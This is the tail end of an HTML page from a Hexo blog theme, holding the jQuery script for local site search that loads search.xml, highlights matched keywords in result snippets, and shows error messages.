                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




    </div>
  </body>
</html>
